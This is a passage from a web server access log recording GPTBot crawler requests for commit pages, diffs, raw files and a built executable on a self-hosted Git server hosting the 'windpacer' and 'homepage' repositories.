AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" -[17/Feb/2026:13:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 10980] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 11039] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:13:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 19732] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:13:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 7486] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 11267] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" -[17/Feb/2026:13:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 10221] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" -[17/Feb/2026:13:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a.diff" [Client 74.7.227.38] [Length 3312] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" -[17/Feb/2026:13:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" -[17/Feb/2026:13:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" -[17/Feb/2026:13:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 9992] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" -[17/Feb/2026:13:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 22472] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" -[17/Feb/2026:13:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" -[17/Feb/2026:13:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" -[17/Feb/2026:13:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" -[17/Feb/2026:13:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" -[17/Feb/2026:13:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a.patch" [Client 74.7.227.38] [Length 3773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 11804] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" -[17/Feb/2026:13:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584.diff" [Client 74.7.227.38] [Length 797987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8.patch" [Client 74.7.227.38] [Length 613112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8.diff" [Client 74.7.227.38] [Length 547811] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9949] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 15173] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 15828] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 11275] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 19703] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" -[17/Feb/2026:13:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" -[17/Feb/2026:13:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24131] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" -[17/Feb/2026:13:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:13:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" -[17/Feb/2026:13:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 7501] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13110] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" -[17/Feb/2026:13:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13143] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" -[17/Feb/2026:13:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 14728] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 7502] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 9839] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" -[17/Feb/2026:13:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" -[17/Feb/2026:13:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" -[17/Feb/2026:13:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 9914] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" -[17/Feb/2026:13:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" -[17/Feb/2026:13:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9508] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12907] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" -[17/Feb/2026:13:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12938] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" -[17/Feb/2026:13:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9857] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" -[17/Feb/2026:13:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" -[17/Feb/2026:13:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 10922] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" -[17/Feb/2026:13:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 22444] [Gzip 10.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" -[17/Feb/2026:13:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" -[17/Feb/2026:13:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" -[17/Feb/2026:13:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 